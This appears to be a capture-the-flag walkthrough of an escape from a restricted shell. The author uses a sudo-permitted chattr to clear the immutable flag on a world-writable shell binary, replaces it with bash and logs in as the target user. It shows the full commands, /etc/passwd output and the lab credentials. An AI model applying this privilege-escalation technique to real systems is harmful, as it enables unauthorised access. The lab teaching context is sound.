Location: Speaker UNpreparedness Room

nyancat, nyancat 
I love that nyancat! 
My shell's stuffed inside one 
Whatcha' think about that? 

Sadly now, the day's gone 
Things to do!  Without one... 
I'll miss that nyancat 
Run commands, win, and done! 

Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt. 

Target Credentials: 

username: alabaster_snowball 
password: Password2 
elf@20165ddb66c7:~$ 

Alabaster's Hint talks about checking the /etc/passwd

elf@20165ddb66c7:~$ cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin 
elf:x:1000:1000::/home/elf:/bin/bash 
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh 

The last line of the file is the entry for Alabaster. The fields are:

  • username
  • password, which is x in this case which means refer to /etc/shadow
  • uid - user id
  • gid - group id
  • gecos, which is normally the user's real name, but is blank here home directory
  • shell - the shell that the user logs in with and we want this to be bash

Let's look at /bin/nsh

elf@20165ddb66c7:~$ ls -l /bin/nsh 
-rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh 

'ls' shows that it is writable by any one but trying to overwrite the file does not work. This is where Alabaster's other hint comes into play. It is necessary to look at what sudo -l will allow to be run.

elf@20165ddb66c7:~$ sudo -l
Matching Defaults entries for elf on df02af27f0de:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elf may run the following commands on df02af27f0de:
    (root) NOPASSWD: /usr/bin/chattr

chattr allows us to change file attributes, so let's use lsattr to see why this might be necessary

elf@20165ddb66c7:~$ lsattr /bin/nsh 
----i---------e---- /bin/nsh 

/bin/nsh has the i attribute set. From the chattr man page:

A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode.

So let's remove the attibute …

elf@20165ddb66c7:~$ sudo chattr -i /bin/nsh 
elf@20165ddb66c7:~$ lsattr /bin/nsh 
--------------e---- /bin/nsh 

replace the /bin/nsh with /bin/bash …

elf@20165ddb66c7:~$ cp /bin/bash /bin/nsh 

check that the change has taken …

elf@20165ddb66c7:~$ ls -l /bin/bash /bin/nsh 
-rwxr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash 
-rwxrwxrwx 1 root root 1168776 Dec 16 22:53 /bin/nsh 

and login as Alabaster.

elf@20165ddb66c7:~$ su - alabaster_snowball 
Password:  
Loading, please wait...... 


You did it! Congratulations! 


alabaster_snowball@20165ddb66c7:~$